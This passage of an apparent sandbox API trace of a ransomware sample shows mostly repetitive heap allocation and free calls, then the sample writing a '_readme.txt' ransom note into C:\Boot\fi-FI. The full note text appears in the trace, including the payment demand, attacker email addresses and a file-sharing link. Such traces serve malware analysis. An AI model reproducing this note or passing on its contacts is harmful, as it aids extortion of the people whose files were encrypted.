(HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.591] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.591] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.591] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.591] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.591] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.591] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.591] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.591] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.591] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.591] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.591] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.591] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.591] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.591] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.591] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.591] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.591] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.591] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.591] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.592] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.592] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.592] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.592] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.592] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.592] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.592] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.592] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.592] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.592] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.592] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.592] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.592] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.592] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.592] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.592] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.592] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.592] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.592] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.592] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.592] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.592] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.592] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.592] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.592] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.592] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.592] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.592] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.592] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.592] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.592] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.592] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.592] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.592] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.592] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.592] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.592] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.592] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.592] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.592] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.593] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.593] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.593] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.593] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.593] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.593] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.593] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.593] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.593] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.593] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.593] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.593] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.593] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.593] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.593] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.593] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.593] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.593] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.593] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.593] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.593] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.593] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.593] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.593] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.593] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.593] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.593] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.593] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.593] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.593] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.593] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.593] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.593] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.593] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.593] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.593] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.594] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.594] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.594] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.594] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.594] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.594] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.594] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.594] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.594] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.594] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.594] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.594] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.594] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.594] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.594] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.594] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.594] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.594] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.594] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.594] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.594] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.594] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.594] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.594] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.594] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.594] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.594] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.594] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.594] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.594] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.594] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.594] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.594] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.594] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.594] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.594] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.595] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.595] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.595] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.595] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.595] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.595] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.595] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.595] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.595] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.595] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.595] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.595] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.595] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.595] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.595] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.595] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.595] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.595] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.595] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.595] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.595] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.595] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.595] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.595] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.595] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.595] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.595] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.595] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.595] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.595] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.595] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.595] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.595] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.595] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.595] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.595] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.596] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.596] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.596] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.596] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.596] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.596] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.596] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.596] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.596] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.596] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.596] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.596] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.596] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.596] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.596] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.596] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.596] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.596] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.596] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.596] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.596] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.596] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.596] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.596] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.596] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.596] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.596] PathFindFileNameW (pszPath="C:\\Boot\\fi-FI\\") returned="fi-FI\\" [0165.596] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.596] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0165.596] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.596] PathFindFileNameW (pszPath="") returned="" [0165.597] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.597] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.597] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.597] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x800) returned 0x3b40090 [0165.597] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.597] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b19640 [0165.597] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.597] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.597] PathAppendW (in: pszPath="C:\\Boot\\fi-FI\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 1 [0165.597] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.597] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.597] PathFileExistsW (pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 0 [0165.598] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b44e70 [0165.598] lstrcpyW (in: lpString1=0x3b44e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.598] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note 